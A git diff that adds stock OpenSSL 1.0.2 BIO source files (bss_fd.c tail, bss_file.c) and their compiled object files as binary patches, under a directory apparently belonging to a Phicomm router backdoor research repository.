+    if (buf[0] != '\0')
+        ret = strlen(buf);
+    return (ret);
+}
+
+int BIO_fd_should_retry(int i)
+{
+    int err;
+
+    if ((i == 0) || (i == -1)) {
+        err = get_last_sys_error();
+
+# if defined(OPENSSL_SYS_WINDOWS) && 0/* more microsoft stupidity? perhaps
+                                       * not? Ben 4/1/99 */
+        if ((i == -1) && (err == 0))
+            return (1);
+# endif
+
+        return (BIO_fd_non_fatal_error(err));
+    }
+    return (0);
+}
+
+int BIO_fd_non_fatal_error(int err)
+{
+    switch (err) {
+
+# ifdef EWOULDBLOCK
+#  ifdef WSAEWOULDBLOCK
+#   if WSAEWOULDBLOCK != EWOULDBLOCK
+    case EWOULDBLOCK:
+#   endif
+#  else
+    case EWOULDBLOCK:
+#  endif
+# endif
+
+# if defined(ENOTCONN)
+    case ENOTCONN:
+# endif
+
+# ifdef EINTR
+    case EINTR:
+# endif
+
+# ifdef EAGAIN
+#  if EWOULDBLOCK != EAGAIN
+    case EAGAIN:
+#  endif
+# endif
+
+# ifdef EPROTO
+    case EPROTO:
+# endif
+
+# ifdef EINPROGRESS
+    case EINPROGRESS:
+# endif
+
+# ifdef EALREADY
+    case EALREADY:
+# endif
+        return (1);
+        /* break; */
+    default:
+        break;
+    }
+    return (0);
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bss_fd.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bss_fd.o
new file mode 100644
index 0000000000000000000000000000000000000000..636d70219377394c143fb4ac3145c20fb295948b
GIT binary patch
literal 5072
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bss_file.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bss_file.c
new file mode 100644
index 0000000..d7f15b0
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bss_file.c
@@ -0,0 +1,465 @@
+/* crypto/bio/bss_file.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+/*-
+ * 03-Dec-1997  rdenny@dc3.com  Fix bug preventing use of stdin/stdout
+ *              with binary data (e.g. asn1parse -inform DER < xxx) under
+ *              Windows
+ */
+
+#ifndef HEADER_BSS_FILE_C
+# define HEADER_BSS_FILE_C
+
+# if defined(__linux) || defined(__sun) || defined(__hpux)
+/*
+ * Following definition aliases fopen to fopen64 on above mentioned
+ * platforms. This makes it possible to open and sequentially access files
+ * larger than 2GB from 32-bit application. It does not allow to traverse
+ * them beyond 2GB with fseek/ftell, but on the other hand *no* 32-bit
+ * platform permits that, not with fseek/ftell. Not to mention that breaking
+ * 2GB limit for seeking would require surgery to *our* API. But sequential
+ * access suffices for practical cases when you can run into large files,
+ * such as fingerprinting, so we can let API alone. For reference, the list
+ * of 32-bit platforms which allow for sequential access of large files
+ * without extra "magic" comprise *BSD, Darwin, IRIX...
+ */
+#  ifndef _FILE_OFFSET_BITS
+#   define _FILE_OFFSET_BITS 64
+#  endif
+# endif
+
+# include <stdio.h>
+# include <errno.h>
+# include "cryptlib.h"
+# include "bio_lcl.h"
+# include <openssl/err.h>
+
+# if defined(OPENSSL_SYS_NETWARE) && defined(NETWARE_CLIB)
+#  include <nwfileio.h>
+# endif
+
+# if !defined(OPENSSL_NO_STDIO)
+
+static int MS_CALLBACK file_write(BIO *h, const char *buf, int num);
+static int MS_CALLBACK file_read(BIO *h, char *buf, int size);
+static int MS_CALLBACK file_puts(BIO *h, const char *str);
+static int MS_CALLBACK file_gets(BIO *h, char *str, int size);
+static long MS_CALLBACK file_ctrl(BIO *h, int cmd, long arg1, void *arg2);
+static int MS_CALLBACK file_new(BIO *h);
+static int MS_CALLBACK file_free(BIO *data);
+static BIO_METHOD methods_filep = {
+    BIO_TYPE_FILE,
+    "FILE pointer",
+    file_write,
+    file_read,
+    file_puts,
+    file_gets,
+    file_ctrl,
+    file_new,
+    file_free,
+    NULL,
+};
+
+BIO *BIO_new_file(const char *filename, const char *mode)
+{
+    BIO *ret;
+    FILE *file = NULL;
+
+#  if defined(_WIN32) && defined(CP_UTF8)
+    int sz, len_0 = (int)strlen(filename) + 1;
+    DWORD flags;
+
+    /*
+     * Basically there are three cases to cover: a) filename is
+     * pure ASCII string; b) actual UTF-8 encoded string and
+     * c) locale-ized string, i.e. one containing 8-bit
+     * characters that are meaningful in current system locale.
+     * If filename is pure ASCII or real UTF-8 encoded string,
+     * MultiByteToWideChar succeeds and _wfopen works. If
+     * filename is locale-ized string, chances are that
+     * MultiByteToWideChar fails reporting
+     * ERROR_NO_UNICODE_TRANSLATION, in which case we fall
+     * back to fopen...
+     */
+    if ((sz = MultiByteToWideChar(CP_UTF8, (flags = MB_ERR_INVALID_CHARS),
+                                  filename, len_0, NULL, 0)) > 0 ||
+        (GetLastError() == ERROR_INVALID_FLAGS &&
+         (sz = MultiByteToWideChar(CP_UTF8, (flags = 0),
+                                   filename, len_0, NULL, 0)) > 0)
+        ) {
+        WCHAR wmode[8];
+        WCHAR *wfilename = _alloca(sz * sizeof(WCHAR));
+
+        if (MultiByteToWideChar(CP_UTF8, flags,
+                                filename, len_0, wfilename, sz) &&
+            MultiByteToWideChar(CP_UTF8, 0, mode, strlen(mode) + 1,
+                                wmode, sizeof(wmode) / sizeof(wmode[0])) &&
+            (file = _wfopen(wfilename, wmode)) == NULL &&
+            (errno == ENOENT || errno == EBADF)
+            ) {
+            /*
+             * UTF-8 decode succeeded, but no file, filename
+             * could still have been locale-ized...
+             */
+            file = fopen(filename, mode);
+        }
+    } else if (GetLastError() == ERROR_NO_UNICODE_TRANSLATION) {
+        file = fopen(filename, mode);
+    }
+#  else
+    file = fopen(filename, mode);
+#  endif
+    if (file == NULL) {
+        SYSerr(SYS_F_FOPEN, get_last_sys_error());
+        ERR_add_error_data(5, "fopen('", filename, "','", mode, "')");
+        if (errno == ENOENT)
+            BIOerr(BIO_F_BIO_NEW_FILE, BIO_R_NO_SUCH_FILE);
+        else
+            BIOerr(BIO_F_BIO_NEW_FILE, ERR_R_SYS_LIB);
+        return (NULL);
+    }
+    if ((ret = BIO_new(BIO_s_file())) == NULL) {
+        fclose(file);
+        return (NULL);
+    }
+
+    BIO_clear_flags(ret, BIO_FLAGS_UPLINK); /* we did fopen -> we disengage
+                                             * UPLINK */
+    BIO_set_fp(ret, file, BIO_CLOSE);
+    return (ret);
+}
+
+BIO *BIO_new_fp(FILE *stream, int close_flag)
+{
+    BIO *ret;
+
+    if ((ret = BIO_new(BIO_s_file())) == NULL)
+        return (NULL);
+
+    BIO_set_flags(ret, BIO_FLAGS_UPLINK); /* redundant, left for
+                                           * documentation puposes */
+    BIO_set_fp(ret, stream, close_flag);
+    return (ret);
+}
+
+BIO_METHOD *BIO_s_file(void)
+{
+    return (&methods_filep);
+}
+
+static int MS_CALLBACK file_new(BIO *bi)
+{
+    bi->init = 0;
+    bi->num = 0;
+    bi->ptr = NULL;
+    bi->flags = BIO_FLAGS_UPLINK; /* default to UPLINK */
+    return (1);
+}
+
+static int MS_CALLBACK file_free(BIO *a)
+{
+    if (a == NULL)
+        return (0);
+    if (a->shutdown) {
+        if ((a->init) && (a->ptr != NULL)) {
+            if (a->flags & BIO_FLAGS_UPLINK)
+                UP_fclose(a->ptr);
+            else
+                fclose(a->ptr);
+            a->ptr = NULL;
+            a->flags = BIO_FLAGS_UPLINK;
+        }
+        a->init = 0;
+    }
+    return (1);
+}
+
+static int MS_CALLBACK file_read(BIO *b, char *out, int outl)
+{
+    int ret = 0;
+
+    if (b->init && (out != NULL)) {
+        if (b->flags & BIO_FLAGS_UPLINK)
+            ret = UP_fread(out, 1, (int)outl, b->ptr);
+        else
+            ret = fread(out, 1, (int)outl, (FILE *)b->ptr);
+        if (ret == 0
+            && (b->flags & BIO_FLAGS_UPLINK) ? UP_ferror((FILE *)b->ptr) :
+            ferror((FILE *)b->ptr)) {
+            SYSerr(SYS_F_FREAD, get_last_sys_error());
+            BIOerr(BIO_F_FILE_READ, ERR_R_SYS_LIB);
+            ret = -1;
+        }
+    }
+    return (ret);
+}
+
+static int MS_CALLBACK file_write(BIO *b, const char *in, int inl)
+{
+    int ret = 0;
+
+    if (b->init && (in != NULL)) {
+        if (b->flags & BIO_FLAGS_UPLINK)
+            ret = UP_fwrite(in, (int)inl, 1, b->ptr);
+        else
+            ret = fwrite(in, (int)inl, 1, (FILE *)b->ptr);
+        if (ret)
+            ret = inl;
+        /* ret=fwrite(in,1,(int)inl,(FILE *)b->ptr); */
+        /*
+         * according to Tim Hudson <tjh@cryptsoft.com>, the commented out
+         * version above can cause 'inl' write calls under some stupid stdio
+         * implementations (VMS)
+         */
+    }
+    return (ret);
+}
+
+static long MS_CALLBACK file_ctrl(BIO *b, int cmd, long num, void *ptr)
+{
+    long ret = 1;
+    FILE *fp = (FILE *)b->ptr;
+    FILE **fpp;
+    char p[4];
+
+    switch (cmd) {
+    case BIO_C_FILE_SEEK:
+    case BIO_CTRL_RESET:
+        if (b->flags & BIO_FLAGS_UPLINK)
+            ret = (long)UP_fseek(b->ptr, num, 0);
+        else
+            ret = (long)fseek(fp, num, 0);
+        break;
+    case BIO_CTRL_EOF:
+        if (b->flags & BIO_FLAGS_UPLINK)
+            ret = (long)UP_feof(fp);
+        else
+            ret = (long)feof(fp);
+        break;
+    case BIO_C_FILE_TELL:
+    case BIO_CTRL_INFO:
+        if (b->flags & BIO_FLAGS_UPLINK)
+            ret = UP_ftell(b->ptr);
+        else
+            ret = ftell(fp);
+        break;
+    case BIO_C_SET_FILE_PTR:
+        file_free(b);
+        b->shutdown = (int)num & BIO_CLOSE;
+        b->ptr = ptr;
+        b->init = 1;
+#  if BIO_FLAGS_UPLINK!=0
+#   if defined(__MINGW32__) && defined(__MSVCRT__) && !defined(_IOB_ENTRIES)
+#    define _IOB_ENTRIES 20
+#   endif
+#   if defined(_IOB_ENTRIES)
+        /* Safety net to catch purely internal BIO_set_fp calls */
+        if ((size_t)ptr >= (size_t)stdin &&
+            (size_t)ptr < (size_t)(stdin + _IOB_ENTRIES))
+            BIO_clear_flags(b, BIO_FLAGS_UPLINK);
+#   endif
+#  endif
+#  ifdef UP_fsetmod
+        if (b->flags & BIO_FLAGS_UPLINK)
+            UP_fsetmod(b->ptr, (char)((num & BIO_FP_TEXT) ? 't' : 'b'));
+        else
+#  endif
+        {
+#  if defined(OPENSSL_SYS_WINDOWS)
+            int fd = _fileno((FILE *)ptr);
+            if (num & BIO_FP_TEXT)
+                _setmode(fd, _O_TEXT);
+            else
+                _setmode(fd, _O_BINARY);
+#  elif defined(OPENSSL_SYS_NETWARE) && defined(NETWARE_CLIB)
+            int fd = fileno((FILE *)ptr);
+            /* Under CLib there are differences in file modes */
+            if (num & BIO_FP_TEXT)
+                setmode(fd, O_TEXT);
+            else
+                setmode(fd, O_BINARY);
+#  elif defined(OPENSSL_SYS_MSDOS)
+            int fd = fileno((FILE *)ptr);
+            /* Set correct text/binary mode */
+            if (num & BIO_FP_TEXT)
+                _setmode(fd, _O_TEXT);
+            /* Dangerous to set stdin/stdout to raw (unless redirected) */
+            else {
+                if (fd == STDIN_FILENO || fd == STDOUT_FILENO) {
+                    if (isatty(fd) <= 0)
+                        _setmode(fd, _O_BINARY);
+                } else
+                    _setmode(fd, _O_BINARY);
+            }
+#  elif defined(OPENSSL_SYS_OS2) || defined(OPENSSL_SYS_WIN32_CYGWIN)
+            int fd = fileno((FILE *)ptr);
+            if (num & BIO_FP_TEXT)
+                setmode(fd, O_TEXT);
+            else
+                setmode(fd, O_BINARY);
+#  endif
+        }
+        break;
+    case BIO_C_SET_FILENAME:
+        file_free(b);
+        b->shutdown = (int)num & BIO_CLOSE;
+        if (num & BIO_FP_APPEND) {
+            if (num & BIO_FP_READ)
+                BUF_strlcpy(p, "a+", sizeof p);
+            else
+                BUF_strlcpy(p, "a", sizeof p);
+        } else if ((num & BIO_FP_READ) && (num & BIO_FP_WRITE))
+            BUF_strlcpy(p, "r+", sizeof p);
+        else if (num & BIO_FP_WRITE)
+            BUF_strlcpy(p, "w", sizeof p);
+        else if (num & BIO_FP_READ)
+            BUF_strlcpy(p, "r", sizeof p);
+        else {
+            BIOerr(BIO_F_FILE_CTRL, BIO_R_BAD_FOPEN_MODE);
+            ret = 0;
+            break;
+        }
+#  if defined(OPENSSL_SYS_MSDOS) || defined(OPENSSL_SYS_WINDOWS) || defined(OPENSSL_SYS_OS2) || defined(OPENSSL_SYS_WIN32_CYGWIN)
+        if (!(num & BIO_FP_TEXT))
+            strcat(p, "b");
+        else
+            strcat(p, "t");
+#  endif
+#  if defined(OPENSSL_SYS_NETWARE)
+        if (!(num & BIO_FP_TEXT))
+            strcat(p, "b");
+        else
+            strcat(p, "t");
+#  endif
+        fp = fopen(ptr, p);
+        if (fp == NULL) {
+            SYSerr(SYS_F_FOPEN, get_last_sys_error());
+            ERR_add_error_data(5, "fopen('", ptr, "','", p, "')");
+            BIOerr(BIO_F_FILE_CTRL, ERR_R_SYS_LIB);
+            ret = 0;
+            break;
+        }
+        b->ptr = fp;
+        b->init = 1;
+        BIO_clear_flags(b, BIO_FLAGS_UPLINK); /* we did fopen -> we disengage
+                                               * UPLINK */
+        break;
+    case BIO_C_GET_FILE_PTR:
+        /* the ptr parameter is actually a FILE ** in this case. */
+        if (ptr != NULL) {
+            fpp = (FILE **)ptr;
+            *fpp = (FILE *)b->ptr;
+        }
+        break;
+    case BIO_CTRL_GET_CLOSE:
+        ret = (long)b->shutdown;
+        break;
+    case BIO_CTRL_SET_CLOSE:
+        b->shutdown = (int)num;
+        break;
+    case BIO_CTRL_FLUSH:
+        if (b->flags & BIO_FLAGS_UPLINK)
+            UP_fflush(b->ptr);
+        else
+            fflush((FILE *)b->ptr);
+        break;
+    case BIO_CTRL_DUP:
+        ret = 1;
+        break;
+
+    case BIO_CTRL_WPENDING:
+    case BIO_CTRL_PENDING:
+    case BIO_CTRL_PUSH:
+    case BIO_CTRL_POP:
+    default:
+        ret = 0;
+        break;
+    }
+    return (ret);
+}
+
+static int MS_CALLBACK file_gets(BIO *bp, char *buf, int size)
+{
+    int ret = 0;
+
+    buf[0] = '\0';
+    if (bp->flags & BIO_FLAGS_UPLINK) {
+        if (!UP_fgets(buf, size, bp->ptr))
+            goto err;
+    } else {
+        if (!fgets(buf, size, (FILE *)bp->ptr))
+            goto err;
+    }
+    if (buf[0] != '\0')
+        ret = strlen(buf);
+ err:
+    return (ret);
+}
+
+static int MS_CALLBACK file_puts(BIO *bp, const char *str)
+{
+    int n, ret;
+
+    n = strlen(str);
+    ret = file_write(bp, str, n);
+    return (ret);
+}
+
+# endif                         /* OPENSSL_NO_STDIO */
+
+#endif                          /* HEADER_BSS_FILE_C */
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bss_file.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bss_file.o
new file mode 100644
index 0000000000000000000000000000000000000000..9d4bf4200a92c15920ec2ac2f1b3d18154fddfa6
GIT binary patch
literal 6792
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

literal 0
HcmV?d00001

